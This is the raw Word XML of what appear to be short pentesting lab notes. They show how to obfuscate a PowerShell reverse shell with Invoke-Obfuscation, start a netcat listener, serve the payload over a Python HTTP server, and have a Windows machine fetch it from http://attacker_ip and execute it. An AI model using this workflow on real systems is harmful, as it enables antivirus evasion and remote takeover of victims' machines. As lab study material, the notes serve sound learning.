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E82F" w14:textId="725EAD08" w:rsidR="006B7D5C" w:rsidRPr="00DE7C99" w:rsidRDefault="006B7D5C">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006B7D5C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Obfuscating PowerShell Code</w:t>
      </w:r>
      <w:r w:rsidRPr="006B7D5C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DBAB858" w14:textId="4C61BB25" w:rsidR="006B7D5C" w:rsidRDefault="00DE7C99">
      <w:r>
        <w:t>Invoke-obfuscation.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59AA3922" w14:textId="653B1C11" w:rsidR="00DE7C99" w:rsidRDefault="00DE7C99">
      <w:r>
        <w:t>DEMO:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4192B36D" w14:textId="77777777" w:rsidR="00DE7C99" w:rsidRDefault="00DE7C99"/>
    <w:p w14:paraId="34B2D72E" w14:textId="0BA17E6A" w:rsidR="00DE7C99" w:rsidRDefault="00E812F7">
      <w:r>
        <w:t># we can run the power shell, that can be done by installing the power shell package in the kali Linux.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BEF4CE7" w14:textId="10A162EE" w:rsidR="00E812F7" w:rsidRDefault="00E812F7"/>
    <w:p w14:paraId="236E5CB0" w14:textId="3E28637B" w:rsidR="00DE7C99" w:rsidRPr="00E812F7" w:rsidRDefault="00E812F7">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E812F7">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Clone it:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="215BEB1B" w14:textId="2E517F67" w:rsidR="00E812F7" w:rsidRDefault="00E812F7">
      <w:hyperlink r:id="rId4" w:history="1">
        <w:r w:rsidRPr="00457A5B">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://github.com/danielbohannon/Invoke-Obfuscation</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="163166E6" w14:textId="77777777" w:rsidR="00E812F7" w:rsidRDefault="00E812F7"/>
    <w:p w14:paraId="6FAE2042" w14:textId="0C69DB5E" w:rsidR="00E812F7" w:rsidRPr="00E812F7" w:rsidRDefault="00E812F7">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E812F7">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>reverse shell cheat sheet:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BB21F12" w14:textId="0AD96FA1" w:rsidR="00E812F7" w:rsidRDefault="00E812F7">
      <w:hyperlink r:id="rId5" w:history="1">
        <w:r w:rsidRPr="00457A5B">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://swisskyrepo.github.io/InternalAllTheThings/cheatsheets/shell-reverse-cheatsheet/#powershell</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="76BD500C" w14:textId="77777777" w:rsidR="00E812F7" w:rsidRDefault="00E812F7"/>
    <w:p w14:paraId="4C6459D5" w14:textId="4DB620C9" w:rsidR="00E812F7" w:rsidRPr="00E812F7" w:rsidRDefault="00E812F7">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E812F7">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>dependencies:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37245FF8" w14:textId="1D80AE30" w:rsidR="00E812F7" w:rsidRDefault="00E812F7">
      <w:r>
        <w:t>sudo apt-get install powershell -y</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61309B25" w14:textId="77777777" w:rsidR="00E812F7" w:rsidRDefault="00E812F7"/>
    <w:p w14:paraId="681AB367" w14:textId="7351EDD6" w:rsidR="00E812F7" w:rsidRDefault="00E812F7">
      <w:r>
        <w:t>#launch powershell on linux:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CD99C66" w14:textId="6C9F9540" w:rsidR="00E812F7" w:rsidRDefault="00E812F7">
      <w:r>
        <w:t>Pwsh</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76FE23C4" w14:textId="5E10F620" w:rsidR="00E812F7" w:rsidRDefault="00E812F7"/>
    <w:p w14:paraId="7B398F49" w14:textId="415E1262" w:rsidR="00E812F7" w:rsidRDefault="00E812F7">
      <w:r>
        <w:t>Cd invoke-obfuscation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="401056E9" w14:textId="18680836" w:rsidR="00E812F7" w:rsidRDefault="00E812F7">
      <w:r>
        <w:t>Dir</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09B3525D" w14:textId="06B2D9F3" w:rsidR="00E812F7" w:rsidRDefault="00E812F7">
      <w:r>
        <w:t>Import-module ./invoke-obfuscation.psd1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19900D93" w14:textId="006AA952" w:rsidR="00E812F7" w:rsidRDefault="00E812F7">
      <w:r>
        <w:t>Cd ..</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54700307" w14:textId="7D91A4E0" w:rsidR="00E812F7" w:rsidRDefault="00E812F7">
      <w:r>
        <w:t>Invoke-obfuscation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FC6AF4F" w14:textId="047F2475" w:rsidR="00FE672F" w:rsidRDefault="00FE672F">
      <w:r>
        <w:t>#if successful it bring up the invoke-obfuscation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32217F01" w14:textId="77777777" w:rsidR="00FE672F" w:rsidRDefault="00FE672F"/>
    <w:p w14:paraId="5ADF9AC4" w14:textId="7AA45FC6" w:rsidR="00B45775" w:rsidRPr="00B45775" w:rsidRDefault="00B45775">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B45775">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>In another tab:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="020A6FFC" w14:textId="77777777" w:rsidR="00B45775" w:rsidRDefault="00B45775" w:rsidP="00B45775">
      <w:r>
        <w:t xml:space="preserve">Copy the code from the </w:t>
      </w:r>
      <w:hyperlink r:id="rId6" w:history="1">
        <w:r w:rsidRPr="00457A5B">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://swisskyrepo.github.io/InternalAllTheThings/cheatsheets/shell-reverse-cheatsheet/#powershell</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="11879D65" w14:textId="77578B51" w:rsidR="00B45775" w:rsidRDefault="00B45775">
      <w:r>
        <w:t>And then edit it in the texteditor:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="671C8E7F" w14:textId="77777777" w:rsidR="00B45775" w:rsidRDefault="00B45775"/>
    <w:p w14:paraId="36DFA2BD" w14:textId="156324DE" w:rsidR="00B45775" w:rsidRDefault="00B45775">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B45775">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Pr</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>e</w:t>
      </w:r>
      <w:r w:rsidRPr="00B45775">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>vi</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>o</w:t>
      </w:r>
      <w:r w:rsidRPr="00B45775">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>us:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28A09B09" w14:textId="121A9FD1" w:rsidR="00B45775" w:rsidRDefault="00B45775">
      <w:r>
        <w:t>Set SCRIPTPATH /home/kali/Desktop/shell.ps1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27C60149" w14:textId="77777777" w:rsidR="00B45775" w:rsidRDefault="00B45775"/>
    <w:p w14:paraId="1F11F296" w14:textId="08882D7A" w:rsidR="00B45775" w:rsidRDefault="00B45775">
      <w:r>
        <w:t>ENCODING</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16680B8C" w14:textId="328B35D3" w:rsidR="00B45775" w:rsidRDefault="00B45775">
      <w:r>
        <w:t>1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="262CA6EF" w14:textId="2721A71A" w:rsidR="00B45775" w:rsidRDefault="00B45775">
      <w:r>
        <w:t>#it will generate the ascii encoded shellcode.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CBC44EE" w14:textId="77777777" w:rsidR="00B45775" w:rsidRDefault="00B45775"/>
    <w:p w14:paraId="168C0C36" w14:textId="0B77D9ED" w:rsidR="00B45775" w:rsidRDefault="00B45775">
      <w:r>
        <w:t>RESET</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0769F1B7" w14:textId="601C3D6D" w:rsidR="00B45775" w:rsidRDefault="00B45775">
      <w:r>
        <w:t># all the obfuscation have been removed.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FFFC328" w14:textId="77777777" w:rsidR="00B45775" w:rsidRDefault="00B45775"/>
    <w:p w14:paraId="74974076" w14:textId="00707DDB" w:rsidR="00B45775" w:rsidRDefault="00B45775">
      <w:r>
        <w:t>BACK</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B85CFCD" w14:textId="0321A390" w:rsidR="00B45775" w:rsidRDefault="00B45775">
      <w:r>
        <w:t>AST</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76D18712" w14:textId="29924459" w:rsidR="00B45775" w:rsidRDefault="00B45775">
      <w:r>
        <w:t>ALL</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D7E1A50" w14:textId="59C430C6" w:rsidR="00B45775" w:rsidRDefault="00B45775">
      <w:r>
        <w:t>1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D8C2473" w14:textId="246E9E7E" w:rsidR="00B45775" w:rsidRDefault="00B45775">
      <w:r>
        <w:t># now new obfuscated code is generated.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50F64C57" w14:textId="77777777" w:rsidR="00B45775" w:rsidRDefault="00B45775"/>
    <w:p w14:paraId="60C72F85" w14:textId="77777777" w:rsidR="00333C98" w:rsidRDefault="00333C98"/>
    <w:p w14:paraId="3AEE89FB" w14:textId="5296206B" w:rsidR="00333C98" w:rsidRDefault="00333C98">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00333C98">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>In another terminal:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B46F693" w14:textId="781F1DB5" w:rsidR="00333C98" w:rsidRDefault="00333C98">
      <w:r>
        <w:t>Nc -nvlp 1234</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59638EAE" w14:textId="77777777" w:rsidR="00333C98" w:rsidRDefault="00333C98"/>
    <w:p w14:paraId="3AB0336E" w14:textId="77777777" w:rsidR="00333C98" w:rsidRDefault="00333C98" w:rsidP="00333C98">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00333C98">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>In another terminal:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3130DD8D" w14:textId="0C29B582" w:rsidR="00333C98" w:rsidRDefault="00CE0953">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Cd Desktop</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EF59F19" w14:textId="640FF992" w:rsidR="00CE0953" w:rsidRDefault="00CE0953">
      <w:r>
        <w:t>Sudo python3 -m http.server 80</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="459E84AC" w14:textId="77777777" w:rsidR="00CE0953" w:rsidRDefault="00CE0953"/>
    <w:p w14:paraId="5F01FA63" w14:textId="5E64E31D" w:rsidR="00CE0953" w:rsidRPr="00CE0953" w:rsidRDefault="00CE0953">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE0953">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>In windows:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7781AC48" w14:textId="1B909A75" w:rsidR="00CE0953" w:rsidRDefault="00CE0953">
      <w:hyperlink r:id="rId7" w:history="1">
        <w:r w:rsidRPr="00457A5B">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>http://attacker_ip</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="6EC61C45" w14:textId="2A080C63" w:rsidR="00CE0953" w:rsidRDefault="00CE0953">
      <w:r>
        <w:t>download the file</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="737065E1" w14:textId="527675D1" w:rsidR="00CE0953" w:rsidRDefault="00CE0953">
      <w:r>
        <w:t>and execute it.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="086A9C53" w14:textId="77777777" w:rsidR="00CE0953" w:rsidRDefault="00CE0953"/>
    <w:p w14:paraId="64B7D561" w14:textId="28C313AB" w:rsidR="00CE0953" w:rsidRDefault="00CE0953">
      <w:r>
        <w:t>You will get the powershell session on the kali.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48CE51F4" w14:textId="77777777" w:rsidR="00CE0953" w:rsidRDefault="00CE0953"/>
    <w:p w14:paraId="62F95D85" w14:textId="77777777" w:rsidR="00333C98" w:rsidRPr="00333C98" w:rsidRDefault="00333C98"/>
    <w:p w14:paraId="102E12DB" w14:textId="77777777" w:rsidR="00333C98" w:rsidRPr="00B45775" w:rsidRDefault="00333C98"/>
    <w:p w14:paraId="5E664741" w14:textId="77777777" w:rsidR="00E812F7" w:rsidRDefault="00E812F7" w:rsidP="00E812F7"/>
    <w:p w14:paraId="6A751FC5" w14:textId="77777777" w:rsidR="00E812F7" w:rsidRPr="00E812F7" w:rsidRDefault="00E812F7" w:rsidP="00E812F7"/>
    <w:sectPr w:rsidR="00E812F7" w:rsidRPr="00E81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B2"/>
    <w:rsid w:val="00333C98"/>
    <w:rsid w:val="00551663"/>
    <w:rsid w:val="00595B1E"/>
    <w:rsid w:val="006B7D5C"/>
    <w:rsid w:val="006E39B2"/>
    <w:rsid w:val="00853ABF"/>
    <w:rsid w:val="00B45775"/>
    <w:rsid w:val="00B64A86"/>
    <w:rsid w:val="00CE0953"/>
    <w:rsid w:val="00DE7C99"/>
    <w:rsid w:val="00E812F7"/>
    <w:rsid w:val="00FE672F"/>
    <w:rsid w:val="00FE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2B74"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{F68BE402-68DE-49F9-BDFC-28BF33C1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9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12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attacker_i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wisskyrepo.github.io/InternalAllTheThings/cheatsheets/shell-reverse-cheatsheet/#powershell" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://swisskyrepo.github.io/InternalAllTheThings/cheatsheets/shell-reverse-cheatsheet/#powershell" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/danielbohannon/Invoke-Obfusc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157</Words>
  <Characters>1366</Characters>
  <Application>Microsoft Office Word</Application>
  <DocSecurity>0</DocSecurity>
  <Lines>105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11</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2025-12-05T07:16:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2025-12-05T07:49:00Z</dcterms:modified>
</cp:coreProperties>
</file>